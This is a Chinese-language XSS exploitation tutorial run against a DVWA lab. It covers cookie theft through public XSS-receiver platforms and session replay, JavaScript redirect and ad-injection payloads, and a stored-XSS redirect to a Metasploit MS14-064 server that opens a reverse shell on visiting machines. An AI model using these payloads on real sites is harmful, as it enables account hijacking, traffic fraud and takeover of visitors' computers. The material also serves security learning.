XSS漏洞利用方式汇总

文章目录

    • 一、窃取Cookie
      • 1.1 目的
      • 1.2 实操
        • 搭建xss平台
        • 获取Cookie
    • 二、广告传播/SEO优化/刷取流量
      • 2.1 目的
      • 2.2 实操
        • 2.2.1 恶意刷取访问量
          • 网页直接跳转
          • 网页延迟跳转
        • 2.2.2 恶意广告展示
    • 三、网页挂马/权限提升
      • 3.1 目的
      • 3.2 环境
      • 3.3 实操
        • 3.3.1 生成木马URL
        • 3.3.2 XSS插入地址

以下所有的针对XSS的利用方式都是对XSS的深一步的学习了解、请勿于未授权环境下进行非法操作!!!

XSS漏洞利用方式汇总_第1张图片

一、窃取Cookie

1.1 目的

  恶意攻击者通过XSS攻击,窃取其他账户的Cookie信息从而进行未授权非法操作。

1.2 实操

搭建xss平台

这里我直接百度一个xss平台来接Cookie

Tips:为了安全起见,建议使用自己搭建的XSS平台(如测试学习,不敏感的话随意)

》》注册一个测试账号([email protected]:fengyue123)
xss平台:

  • https://xss.pt
  • https://xsshs.cn
    XSS漏洞利用方式汇总_第2张图片
    》》任意创建一个项目
    XSS漏洞利用方式汇总_第3张图片
    XSS漏洞利用方式汇总_第4张图片
    》》复制payload
    XSS漏洞利用方式汇总_第5张图片

获取Cookie

》》这里我们使用靶场DVWA进行测试,在存在xss地方输入payload:

XSS漏洞利用方式汇总_第6张图片
》》点击提交后即可在解cookie平台获取到当前账户的cookie和真实IP:
XSS漏洞利用方式汇总_第7张图片
》》使用管理员的cookie登录系统(使用Chrome上的F12开发者工具,将拿到的Cookie值放入到Application中,浏览器输入跳转的目的地址回车便成功登录他人账户)
XSS漏洞利用方式汇总_第8张图片

二、广告传播/SEO优化/刷取流量

2.1 目的

  通过恶意的JS代码将正常页面跳转到目的页面,利用网站进行重定向实现其引流、广告位传播等目的。

2.2 实操

2.2.1 恶意刷取访问量

网页直接跳转

(3种方式)

<script type="text/javascript">window.location.href="跳转的目的地址";</script>
<script type="text/javascript">window. location.replace("跳转的目的地址");</script>
<script type="text/javascript">window. location.assign("跳转的目的地址");</script>

》》为了体现效果,对靶机DVWA 存储型XSS处插入JS代码实现网页跳转:
(用户一访问到此页面就自动访问访问我博客的某一篇文章,访问量就+1)
XSS漏洞利用方式汇总_第9张图片

网页延迟跳转

(网页停留三秒后再进行跳转)

<script type="text/javascript">
  function jumurl(){
  window.location.href = 'https://www.baidu.com';
  }
  setTimeout(jumurl,3000);
</script>

2.2.2 恶意广告展示

这里可以通过导入外链的方式对受害站点插入广告位,以来传播广告

<script>document.writeln("");</script>

XSS漏洞利用方式汇总_第10张图片

三、网页挂马/权限提升

3.1 目的

  通过木马服务器(kali)搭建生成一个恶意URL地址,并通过存储型XSS挂到页面中。只要存在未打相应补丁的用户访问了挂马页面,恶意攻击者便获取到了受害者的控制权限(重点在于目的系统是否打了相应补丁)

3.2 环境

  • 木马服务器(Kali  MS14-064  IP:192.168.7.129)
  • 受害者(Windows Server 2003 R2  IP:192.168.7.136)
  • 存在XSS的服务器(Win10 DVWA靶机 IP:192.168.1.103)

3.3 实操

3.3.1 生成木马URL

》》启动Metasploit
XSS漏洞利用方式汇总_第11张图片
》》调用缓冲区溢出漏洞MS14-064(影响范围Win95-Win10,触发该漏洞条件要客户端装有power shell,详情见:微软官网)
XSS漏洞利用方式汇总_第12张图片
》》设置木马服务器IP,允许调用powsershell
在这里插入图片描述
》》调用反弹连接payload

Tips:reverse_tcp好处:靶机主动连接我们,不用担心靶机防火墙的问题

XSS漏洞利用方式汇总_第13张图片
》》设置监听IP,使用默认监听端口4444,执行攻击(自动生成攻击地址)
XSS漏洞利用方式汇总_第14张图片

3.3.2 XSS插入地址

》》恶意攻击者通过存储型xss将木马服务器生成的地址插入到网站中:

<script type="text/javascript">window.location.href="http://192.168.7.129:8080/W0fGq97a2ICU0
";</script>

XSS漏洞利用方式汇总_第15张图片
》》当存在ms14-064漏洞的主机访问到该页面,攻击者就会获取到目的服务器操作系统的权限(如开启摄像头、添加用户、截屏、录音等)
(win2003r2模拟访问)
XSS漏洞利用方式汇总_第16张图片

XSS漏洞利用方式汇总_第17张图片
XSS漏洞利用方式汇总_第18张图片

你可能感兴趣的:(Web安全)